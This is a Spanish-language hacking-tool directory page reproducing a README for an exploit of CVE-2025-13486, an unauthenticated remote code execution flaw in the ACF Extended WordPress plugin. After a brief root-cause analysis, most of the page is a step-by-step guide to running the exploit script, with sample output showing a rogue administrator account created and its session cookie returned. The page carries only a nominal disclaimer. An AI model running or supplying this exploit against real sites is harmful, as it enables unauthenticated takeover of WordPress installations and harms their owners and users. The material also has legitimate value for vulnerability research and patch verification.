Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-13486 — CVE-2025-13486 - Ejecución remota de código y explotación de escalada de privilegios | Kitploit
Herramientas/GitHubGitHub/whattheslime/cve-2025-13486
Escalada de PrivilegiosAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubwhattheslime/cve-2025-13486

CVE-2025-13486

CVE-2025-13486 - Ejecución remota de código y explotación de escalada de privilegios

Ver Repositorio
11hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-13486 explotación

Plugin ACF Extended para WordPress — Ejecución Remota de Código y Escalada de Privilegios

Explotación de la CVE-2025-13486 descubierta por Marcin Dudek (dudekmar)

⚠️ Aviso legal

Este repositorio se proporciona únicamente con fines de investigación y seguridad defensiva. El autor no asume ninguna responsabilidad por el mal uso de esta información.


📌 Resumen

El plugin Advanced Custom Fields: Extended (ACFE) para WordPress es vulnerable a Ejecución Remota de Código (RCE) en las versiones 0.9.0.5 a 0.9.1.1.

La vulnerabilidad existe en la función prepare_form(), que acepta entrada controlada por el usuario y la reenvía a call_user_func_array() sin la validación adecuada.

Esto permite a atacantes no autenticados ejecutar código PHP arbitrario en el servidor de manera limitada, pero suficiente para crear una cuenta de administrador e iniciar sesión.


🔬 Análisis de causa raíz

La cadena de vulnerabilidades es la siguiente:

  1. includes/modules/form/module-form-front.php:24 -> La acción wp_ajax_nopriv_acfe/form/render_form_ajax activa el controlador render_form_ajax.

  2. includes/modules/form/module-form-front.php:492 -> El filtro acfe/form/prepare_form se aplica, invocando la función prepare_form().

  3. includes/modules/form/module-form-front-render.php:151 -> Los datos $form controlados por el usuario se pasan directamente a call_user_func_array().


🎯 Explotación

  1. Instalar las dependencias de Python:

    root@kitploit:~
    python3 -m venv venv
    venv/bin/pip install -r requirements.txt
    
  2. Identificar un objetivo WordPress vulnerable.

    El objetivo debe contener una página con un formulario generado por ACFE.

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
    

    Ejemplo de salida:

    root@kitploit:~
    [2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
    
  3. Ejecutar el script nuevamente con la bandera --exploit:

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
    

    Ejemplo de salida:

    root@kitploit:~
    [2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
    [2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
    [2025-12-19] [11:00:14] [success] Authentication succeded!
    [2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
    

📚 Referencias

  • https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
  • https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
Descargar herramienta
  • Usar la cookie de autenticación de WordPress devuelta para iniciar sesión como la cuenta de administrador recién creada.